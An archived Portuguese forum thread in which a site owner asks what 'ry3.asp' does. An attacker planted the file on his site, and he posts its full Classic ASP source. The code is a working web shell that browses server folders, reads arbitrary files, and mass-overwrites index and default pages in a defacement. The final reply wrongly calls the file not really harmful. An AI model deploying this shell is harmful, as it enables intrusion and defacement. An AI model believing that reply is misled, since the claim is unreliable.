Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

srafael

RY3.asp(Hacker)

Por , em ASP Clássico

Recommended Posts

srafael    0

srafael
Postado

Uma das minhas paginas foi invadida. A pessoa que invadiu colocou uma pagina chamada ry3.asp que lista todos os arquivos do servidor. Alguem conhece esta pagina? Sabe o que ela realmente faz? O que significa ry3?

Compartilhar este post

Link para o post
Compartilhar em outros sites

silas_i    0

silas_i
Postado

Eu posso estar engando porém acho que isso é só o nome da página....Mas se der posta o Código ae pra gente verUm abraço

Compartilhar este post

Link para o post
Compartilhar em outros sites

silas_i    0

silas_i
Postado

Ahhh só uma dúvida que surgiu agora...A página lista o que !??? Os arquivos do servidor !? ou o Componentes instalados no servidor !?

Compartilhar este post

Link para o post
Compartilhar em outros sites

silas_i    0

silas_i
Postado

Me manda o código fonte... se quiser manda em PVT !Valeu

Compartilhar este post

Link para o post
Compartilhar em outros sites

srafael    0

srafael
Postado

Aqui esta o codigo!<%On Error Resume NextSet Objeto=Server.CreateObject("Scripting.FileSystemObject")if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5"))end if %><%On Error Resume Nextif request("t3") <> "" thenSet ObjPasta2 = Objeto.GetFolder(request("t3"))set ObjFso=server.CreateObject("Scripting.FileSystemObject")var_caminho=request("t3")For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "<font color=red><br>Erro em: </font>" & pasta.name err=0 else response.write "<br>OK em " & pasta.name end if set ObjAbreArq = nothing nextset ObjFso=nothingSet ObjPasta2 = nothingset ObjFso = nothingend if%><html><head><title>.</title></head><body><p align="center">Você está em: <%=server.mappath("ry3.asp")%> </p><form method="POST" action="ry3.asp"> <p>Caminho: <input type="text" name="T3" size="44"><br> Texto:<input type="text" name="T4" size="73" value="#affix ownz u - _EviL_"> <input type="submit" value="Iniciar" name="B1"></p></form><form method="POST" action="ry3.asp"> <div align="center"><center><p>Prompt: <input type="text" name="T5" size="43" value="<%=request("t5")%>"><input type="submit" value="Dir" name="B1"></p> </center></div></form><div align="center"><center><table border="1" width="70%" bordercolor="#FF0000" cellspacing="0" cellpadding="0"> <tr> <td width="50%"><p align="center">Diretórios Numerados</td> <td width="50%"><p align="center">Arquivos</td> </tr> <tr> <td width="50%" valign="top"><% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "<br>" contador=contador+1 next%></td> <td width="50%" valign="top"><%On Error Resume Next For Each Arquivo in ObjPasta.Files Response.Write Arquivo.Name & "<br>" Next%></td> </tr></table></center></div><form method="POST" action="ry3.asp"> <div align="center"><center><p>Caminho: <input type="text" name="TT" size="39"> <input type="submit" value="Ver Arquivo" name="B1"></p> </center></div></form><%On Error Resume Nextif request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "<TEXTAREA NAME=sujos ROWS=10 COLS=70>" & Linha & "</TEXTAREA>" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothigend if%></body><%set ObjPasta = nothingset Objeto = nothing%></html>

Compartilhar este post

Link para o post
Compartilhar em outros sites

Bartware    0

Bartware
Postado

Ae cara...Tudo que esse arquivo faz é inserir uma linha no teu arquivo principal (index.asp, default.asp..) para chamar essa pagina...Ela não tem realmente um conteúdo maléfico... sugiro que você contate o suporte do servidor apontando para uma falha de segurança que permite a usuários não autorizados o acesso completo a sua pasta pessoal no servidor...[]'sBruno

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos ASP Clássico
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito